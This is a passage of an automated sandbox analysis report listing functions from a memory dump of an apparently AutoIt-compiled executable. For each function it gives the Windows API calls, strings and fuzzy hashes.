Opcode Fuzzy Hash: 1b13a1ad88b353b63c409d6240a50152625451a370e5aa11934ab20f2af4cf01
Instruction Fuzzy Hash: 4E51B5A05447D53DFB7287748C45BBABFE95F06300F08888AE1D946AC2D795EC94E770

Function 000D55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 000D560A
_wcsncpy.LIBCMT ref: 000D563F
_wcsncpy.LIBCMT ref: 000D5671
_wcsncpy.LIBCMT ref: 000D56A4
_wcsncpy.LIBCMT ref: 000D56E6
_wcsncpy.LIBCMT ref: 000D5720
_wcsncpy.LIBCMT ref: 000D574F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: fe5394a106614c6a734b2be56bc06a9b3e9a33be91bfc15da40edc71e643a4df
Instruction ID: b891fe6a0188d65f258a17d9c58a6f8c1ffadd38a0e8ee7a2c0f91adf22e3687
Opcode Fuzzy Hash: fe5394a106614c6a734b2be56bc06a9b3e9a33be91bfc15da40edc71e643a4df
Instruction Fuzzy Hash: FC419365C1061476CF11FBB4CC8A9CFB7B89F08311F508966E918E3222FB34E255D7AA

Function 000D3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000D466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000D3697,?), ref: 000D468B

Part of subcall function 000D466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000D3697,?), ref: 000D46A4

lstrcmpiW.KERNEL32(?,?), ref: 000D36B7
_wcscmp.LIBCMT ref: 000D36D3
MoveFileW.KERNEL32(?,?), ref: 000D36EB
_wcscat.LIBCMT ref: 000D3733
SHFileOperationW.SHELL32(?), ref: 000D379F

Strings

\*.*, xrefs: 000D372D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 13b01cefe7cf004ef5663779e55c67e0506613dbca650887ae4b8eb374691add
Instruction ID: 6a400c0338cff0bf79352f0435b01ab6004e09ec75d8e8ff71ceb1ff15b093ba
Opcode Fuzzy Hash: 13b01cefe7cf004ef5663779e55c67e0506613dbca650887ae4b8eb374691add
Instruction Fuzzy Hash: 4C41A071508344AEC761EF64D4459EFB7E8AF89380F00486FB48AC3252EB34D689C767

Function 000F7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000F72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000F7351
IsMenu.USER32(?), ref: 000F7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000F73B1
DrawMenuBar.USER32 ref: 000F73C4

Strings

0, xrefs: 000F729E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 4f65b82d50777a4fd6fc734a900e140ff09554b5497658979aa950c4a896ff15
Instruction ID: 564249a9d847b5eca8c35a73e8048b69f6f5f46d3b1511190a6e769bd4107cd8
Opcode Fuzzy Hash: 4f65b82d50777a4fd6fc734a900e140ff09554b5497658979aa950c4a896ff15
Instruction Fuzzy Hash: 1C412575A04209AFDB20DF50D884AAABBF9FF08350F148469FE09AB650D730AE50EB51

Function 000F0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 000F0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000F0FFE
FreeLibrary.KERNEL32(00000000), ref: 000F10B5

Part of subcall function 000F0FA5: RegCloseKey.ADVAPI32(?), ref: 000F101B
Part of subcall function 000F0FA5: FreeLibrary.KERNEL32(?), ref: 000F106D
Part of subcall function 000F0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 000F1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 000F1058

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 404ec677ca499e2e33b68d4eddfbc9f8cb7b75d98a373c275cc54090c54db7e7
Instruction ID: e1dfac313c7a92dbb6e4d88d932403fcfa8abc3771dd59b2b273c12c5dcf7846
Opcode Fuzzy Hash: 404ec677ca499e2e33b68d4eddfbc9f8cb7b75d98a373c275cc54090c54db7e7
Instruction Fuzzy Hash: 30310C7190110DFFEB25DB90DC89EFFB7BCEF08310F100169E601E2551EA749E89AAA4

Function 000F62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000F62EC
GetWindowLongW.USER32(01524C18,000000F0), ref: 000F631F
GetWindowLongW.USER32(01524C18,000000F0), ref: 000F6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000F6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000F63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 000F63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000F63DB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 01ed776c1474200ec3ec60b5e80173c51893f0027ba394c6ba0d7a57538ee346
Instruction ID: a7e5891ee1cffbc2ba136b59cee82315edc8bf1fe91688e94ea26138c248f2ca
Opcode Fuzzy Hash: 01ed776c1474200ec3ec60b5e80173c51893f0027ba394c6ba0d7a57538ee346
Instruction Fuzzy Hash: 59311331644259AFEB20CF19DC85F6837E1FB4A754F1901A4F601CFAB2CB72A980EB50

Function 000CDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000CDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000CDB54
SysAllocString.OLEAUT32(00000000), ref: 000CDB57
SysAllocString.OLEAUT32(?), ref: 000CDB75
SysFreeString.OLEAUT32(?), ref: 000CDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 000CDBA3
SysAllocString.OLEAUT32(?), ref: 000CDBB1

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 866e1f06acb4a669f887e14e829d95411b27cb219a522df037d68d690d6e2dee
Instruction ID: 90f9b24394773a7d1f5279a7c3447e7c3dba8c706ac8b7b0964509a1a22b3b1e
Opcode Fuzzy Hash: 866e1f06acb4a669f887e14e829d95411b27cb219a522df037d68d690d6e2dee
Instruction Fuzzy Hash: 6C215C7660021AAFAB10ABA8DC88DBF77ACEB09360B05853AB914DB251D774AC419764

Function 000E6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000E7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 000E7DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000E61C6
WSAGetLastError.WSOCK32(00000000), ref: 000E61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 000E620E
connect.WSOCK32(00000000,?,00000010), ref: 000E6217
WSAGetLastError.WSOCK32 ref: 000E6221
closesocket.WSOCK32(00000000), ref: 000E624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 000E6263

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: d90b0decbc5e97a2a079fae90a7ee82c36c4fa7f127f44b187dc1d406b1c3228
Instruction ID: 500ef8744e0052a561fccb2d507dc643a7a006818423487eeed90da6df77c2e1
Opcode Fuzzy Hash: d90b0decbc5e97a2a079fae90a7ee82c36c4fa7f127f44b187dc1d406b1c3228
Instruction Fuzzy Hash: 9F31A131600118AFEF10AF65DC85BBE77A8EF55790F048069FD19A7292CB75AC04DBA2

Function 000CF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000CF671
__wcsnicmp.LIBCMT ref: 000CF692
__wcsnicmp.LIBCMT ref: 000CF6AC

Strings

#OnAutoItStartRegister, xrefs: 000CF6A6
#notrayicon, xrefs: 000CF669
#requireadmin, xrefs: 000CF68C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: e425ff043e6506e353309b7907845b592c8b75ce95b647580abf40b19f3df9fd
Instruction ID: 066739af4e88bd7e8ee3e004c42bcaa6b43c5a675412223a4234c0faf0b0ad68
Opcode Fuzzy Hash: e425ff043e6506e353309b7907845b592c8b75ce95b647580abf40b19f3df9fd
Instruction Fuzzy Hash: 9521F9722085126AD630A734AC02FFFB3DAEF55350F14853DF98687192EBA19D41D396

Function 000CDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000CDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000CDC2F
SysAllocString.OLEAUT32(00000000), ref: 000CDC32
SysAllocString.OLEAUT32 ref: 000CDC53
SysFreeString.OLEAUT32 ref: 000CDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 000CDC76
SysAllocString.OLEAUT32(?), ref: 000CDC84

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a1cb3afb8f5a782eb443ba35f4d1e84a08e3f03df28859b066498ed159d54f06
Instruction ID: 982e3dd983520f8d275e155389ffd4a4dfc45cd13c093000e4a92ad86d004713
Opcode Fuzzy Hash: a1cb3afb8f5a782eb443ba35f4d1e84a08e3f03df28859b066498ed159d54f06
Instruction Fuzzy Hash: 8D213335604105AFAB10ABA8DC88DBE77ECEF09360B14813AF914CB6A1D674EC41D764

Function 000F75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00071D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00071D73
Part of subcall function 00071D35: GetStockObject.GDI32(00000011), ref: 00071D87
Part of subcall function 00071D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00071D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000F7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000F763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000F764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000F7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000F7665

Strings

Msctls_Progress32, xrefs: 000F7603

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 0aa66680884b28fa5e8486cd3e21086ff3e678f812eab30195c7f7a0dd442d58
Instruction ID: e7c887f3a40b8d33144185599c0ecd73718886b7f6d014ac65a44764cf123399
Opcode Fuzzy Hash: 0aa66680884b28fa5e8486cd3e21086ff3e678f812eab30195c7f7a0dd442d58
Instruction Fuzzy Hash: 8F1151B115011DBEEF159F64CC85EF77F6DEF08798F114115BB08A6091CA729C21DBA4

Function 00099AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00099AE6

Part of subcall function 00093187: EncodePointer.KERNEL32(00000000), ref: 0009318A
Part of subcall function 00093187: __initp_misc_winsig.LIBCMT ref: 000931A5
Part of subcall function 00093187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00099EA0
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00099EB4
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00099EC7
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00099EDA
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00099EED
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00099F00
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00099F13
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00099F26
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00099F39
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00099F4C
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00099F5F
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00099F72
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00099F85
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00099F98
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00099FAB
Part of subcall function 00093187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00099FBE

__mtinitlocks.LIBCMT ref: 00099AEB
__mtterm.LIBCMT ref: 00099AF4

Part of subcall function 00099B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00099AF9,00097CD0,0012A0B8,00000014), ref: 00099C56
Part of subcall function 00099B5C: _free.LIBCMT ref: 00099C5D
Part of subcall function 00099B5C: DeleteCriticalSection.KERNEL32(0012EC00,?,?,00099AF9,00097CD0,0012A0B8,00000014), ref: 00099C7F

__calloc_crt.LIBCMT ref: 00099B19
__initptd.LIBCMT ref: 00099B3B
GetCurrentThreadId.KERNEL32 ref: 00099B42

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 264923fdd92e42c11de1930387c844626c89b64754051477c747b2fbc4d97f48
Instruction ID: 13bf7b7e7c3675d298afa937c343cb0162ff6a08877ad74f84ea0eeaf6d9b442
Opcode Fuzzy Hash: 264923fdd92e42c11de1930387c844626c89b64754051477c747b2fbc4d97f48
Instruction Fuzzy Hash: 20F0903250A7126AEE74777DBC036DA26D0DF02734F214A1EF460C51E3EF25848166A2

Function 0009406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00093F85), ref: 00094085
GetProcAddress.KERNEL32(00000000), ref: 0009408C
EncodePointer.KERNEL32(00000000), ref: 00094097
DecodePointer.KERNEL32(00093F85), ref: 000940B2

Strings

RoUninitialize, xrefs: 00094074
combase.dll, xrefs: 00094080

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 45b9b83f1a7e5c9e9245124a99d7b9619591cf637d6f0191e4dca4000a07611b
Instruction ID: 333a0015989fbb1bbbed211a20b4e26d3220519d26ff910612a0c7e6d1cad768
Opcode Fuzzy Hash: 45b9b83f1a7e5c9e9245124a99d7b9619591cf637d6f0191e4dca4000a07611b
Instruction Fuzzy Hash: A1E0B670581302EFEF50AFA1EC0DF253AA4BB04742F104024F125E19A0CBBA4680FB28

Function 000D64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000D660B
_memmove.LIBCMT ref: 000D6546

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

_memmove.LIBCMT ref: 000D65B9
_memmove.LIBCMT ref: 000D66A0
_memmove.LIBCMT ref: 000D66B9
_memmove.LIBCMT ref: 000D66D5

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 6f5616a281d065923bdaa7ed06b3dd55198b45e406c6feff4ad18c9762ef1944
Instruction ID: c3db7731616d0dd2646b790d1a0b2c81e56c3383e54bef419729d4da1a6d3655
Opcode Fuzzy Hash: 6f5616a281d065923bdaa7ed06b3dd55198b45e406c6feff4ad18c9762ef1944
Instruction Fuzzy Hash: D5617A3090065AABCF11EF64CC82EFE37A5AF05308F04855AF8596B293DB39ED05DB65

Function 000F01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000F0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000EFDAD,?,?), ref: 000F0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000F02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000F02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000F0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000F0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 000F038C
RegCloseKey.ADVAPI32(00000000), ref: 000F0399

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 6262b55bbcbfad730437316d7f6e227d4ee7ecff91e23700eb9ef7d3066e509d
Instruction ID: 2aa1b09b1648781f1cc27be6fd4717cd2ca4fe25593a0acf72bc6f59bfabdb83
Opcode Fuzzy Hash: 6262b55bbcbfad730437316d7f6e227d4ee7ecff91e23700eb9ef7d3066e509d
Instruction Fuzzy Hash: 69517A31608205AFC710EF64C885EBEBBE9FF84310F04891DF649872A2DB75E905DB52

Function 000F5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 000F57FB
GetMenuItemCount.USER32(00000000), ref: 000F5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000F585A
GetMenuItemID.USER32(?,?), ref: 000F58C9
GetSubMenu.USER32(?,?), ref: 000F58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 000F5928

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
